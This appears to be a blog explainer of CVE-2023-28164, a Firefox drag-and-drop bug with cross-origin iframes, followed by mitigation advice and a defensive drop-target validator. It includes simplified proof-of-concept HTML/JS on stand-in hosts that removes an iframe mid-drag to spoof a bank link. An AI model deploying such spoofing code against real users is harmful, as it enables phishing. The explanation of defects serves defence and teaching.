---

Every year, browser bugs open the door to sneaky attacks, and CVE-2023-28164 is a classic case where a small drag-and-drop error created real risk for Firefox users. In this article, I'll break down what this vulnerability is, how it worked, show simplified code examples, and explain why it could confuse users and help bad actors spoof websites.

What Was CVE-2023-28164?

In short, when you dragged a URL from a cross-origin <iframe> in Firefox and the iframe was removed by script during the drag operation, the browser didn't fully clean up the drag data it had attached to that operation. This meant attackers could misrepresent the link being dragged, tricking users into visiting malicious sites that looked more trustworthy than they actually were.

Affected versions: Firefox before 111 and Thunderbird before 102.9.

It was fixed in Firefox 111, released in March 2023.

Original advisories:  
- Mozilla Foundation Security Advisory 2023-09  
- CVE page on NVD

How Did This Happen?

Browsers let a page embed another document with an <iframe>, and that embedded document is often cross-origin (served from a different site or domain).

If you drag a link from inside an iframe, the browser populates the drag operation's data (the DataTransfer) with the link's URL. But if the iframe disappears mid-drag (because JavaScript removed it), Firefox fumbled the operation and could leave unexpected data attached to the drag even though the element that started it no longer existed.

Attackers could abuse this flow to create "phony" drag-and-drop operations, fooling users into dragging trusted site links to untrusted places.

1. Host a helper page on attacker.com/iframe.html

<!-- attacker.com/iframe.html -->
<a href="https://bank.com/login" id="drag-link">Open Your Bank!</a>
<script>
document.getElementById('drag-link').ondragstart = (e) => {
  // The browser has already filled e.dataTransfer with the link's URL.
  // An attacker could overwrite that data here if needed, e.g.:
  // e.dataTransfer.setData('text/plain', 'https://bank.com/login');

  // Tell the embedding page that the drag has begun. postMessage is used
  // because the two pages are cross-origin and cannot touch each other's DOM.
  window.parent.postMessage('dragstart', 'https://evilsite.com');
};
</script>

2. The malicious site embeds this page and uses JavaScript to remove the iframe mid-drag

<!-- evilsite.com/index.html -->
<iframe src="https://attacker.com/iframe.html" id="evilIframe"></iframe>
<script>
const iframe = document.getElementById('evilIframe');
// The iframe is cross-origin, so this page cannot reach into its document
// (iframe.contentWindow.document would throw a SecurityError). Instead it
// waits for the helper page to announce the drag via postMessage.
window.addEventListener('message', (event) => {
  if (event.origin !== 'https://attacker.com' || event.data !== 'dragstart') return;
  // Remove the iframe right after the drag starts, while the drag is still in progress
  setTimeout(() => {
    iframe.remove();
  }, 10);
});
</script>

Firefox is now confused: the element that started the drag is gone, but the drag-and-drop data is still present and incomplete.

- The user thinks they are dragging a normal bank URL, but the site could manipulate the drag data, or the uncleaned data could point to a phishing page.

This could lead to the user dropping the link somewhere (an email, a bookmark bar, another app) believing it comes from the real bank, when in reality the destination is falsified or points to an attacker's website.

Why Is This Dangerous?

- URL spoofing: The visual label and the actual link can diverge, letting attackers disguise bad links as good ones.
- Phishing: Users who drag-and-drop links into messages, bookmarks, or new tabs may end up visiting malicious pages.
- User confusion: The browser UI usually helps users spot red flags, but this bug bypassed some protections.

In short, the attack:

- removes the iframe as soon as the user starts to drag, and
- relies on Firefox mishandling the event, leaving "ghost" drag data to be picked up by the attacker's scripts.

Mitigation

- Update Firefox to 111 or later (Thunderbird to 102.9 or later), where the issue is fixed.
- If you're building a site, avoid relying on cross-origin iframe drag-and-drop unless absolutely necessary, and have your drop targets check the real destination URL instead of trusting the label the user saw.
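The label/destination divergence described under "Why Is This Dangerous?" is something a drop target can check for itself. The following is an added example written for this article, not code from the original post or from Mozilla. It assumes the drop target knows which origins it expects (here https://bank.com), that the dragged link arrives as a text/uri-list payload with an optional text/plain label, and it uses a constructed fakeTransfer stand-in for the browser's DataTransfer so the logic can run and be tested outside a browser.

```javascript
// Added example (not from the original article): vet a dropped link by its real
// destination (text/uri-list) instead of trusting whatever label the user saw.

// Parse a text/uri-list payload (RFC 2483): one URL per line, lines starting
// with '#' are comments, blank lines are ignored. Returns the URLs in order.
function parseUriList(text) {
  return String(text || '')
    .split(/\r?\n/)
    .map((line) => line.trim())
    .filter((line) => line.length > 0 && !line.startsWith('#'));
}

// Decide whether a dropped link may be acted on. `transfer` is anything with a
// getData(type) method: a real DataTransfer in the browser, or fakeTransfer() below.
// Returns { ok: true, url } or { ok: false, reason }.
function vetDroppedLink(transfer, allowedOrigins) {
  const uris = parseUriList(transfer.getData('text/uri-list'));
  if (uris.length === 0) return { ok: false, reason: 'no text/uri-list payload' };
  if (uris.length > 1) return { ok: false, reason: 'more than one URL in payload' };

  let target;
  try {
    target = new URL(uris[0]);
  } catch (err) {
    return { ok: false, reason: 'destination is not a valid URL' };
  }
  if (target.protocol !== 'https:' && target.protocol !== 'http:') {
    return { ok: false, reason: 'scheme ' + target.protocol + ' is not allowed' };
  }
  if (!allowedOrigins.includes(target.origin)) {
    return { ok: false, reason: 'origin ' + target.origin + ' is not allowlisted' };
  }

  // If a text/plain label also arrived and it looks like a URL, its origin must
  // match the real destination. A mismatch is exactly the label/destination
  // divergence described in the article.
  const label = String(transfer.getData('text/plain') || '').trim();
  if (label) {
    let labelUrl = null;
    try {
      labelUrl = new URL(label);
    } catch (err) {
      labelUrl = null; // free text such as "Open Your Bank!", nothing to compare
    }
    if (labelUrl && labelUrl.origin !== target.origin) {
      return {
        ok: false,
        reason: 'label says ' + labelUrl.origin + ' but destination is ' + target.origin,
      };
    }
  }
  return { ok: true, url: target.href };
}

// Constructed stand-in for the browser's DataTransfer, so the check can be
// exercised (and tested) outside a browser. `items` maps MIME type to payload.
function fakeTransfer(items) {
  return { getData: (type) => (type in items ? items[type] : '') };
}

// Browser wiring (assumed: a drop-zone element and a navigate callback that the
// page supplies, e.g. (u) => { window.location.href = u; }).
function installDropGuard(dropZone, allowedOrigins, navigate) {
  dropZone.addEventListener('dragover', (e) => e.preventDefault());
  dropZone.addEventListener('drop', (e) => {
    e.preventDefault(); // never let the browser navigate on its own
    const verdict = vetDroppedLink(e.dataTransfer, allowedOrigins);
    if (verdict.ok) {
      navigate(verdict.url);
    } else {
      console.warn('Drop rejected: ' + verdict.reason);
    }
  });
}
```

The important design choice is that the decision is made on the machine-readable destination, never on the text the user saw, and that the drop handler calls preventDefault() so the browser itself never performs a navigation on drop.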

References & Further Reading

- Mozilla Foundation Security Advisory 2023-09
- CVE-2023-28164 on NVD
- Firefox Security Updates 2023
- MDN: Drag and Drop API

Final Words

CVE-2023-28164 is a great reminder: even tiny UX features like drag-and-drop demand full attention from security engineers, as a single misstep can pave the way for major risks.

Always keep your browser updated, stay aware of the tricks hackers use, and spread the word to keep the web safer!

If you need more technical details or have questions about web security, feel free to reach out or comment below!

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/09/2023 16:03:00 UTC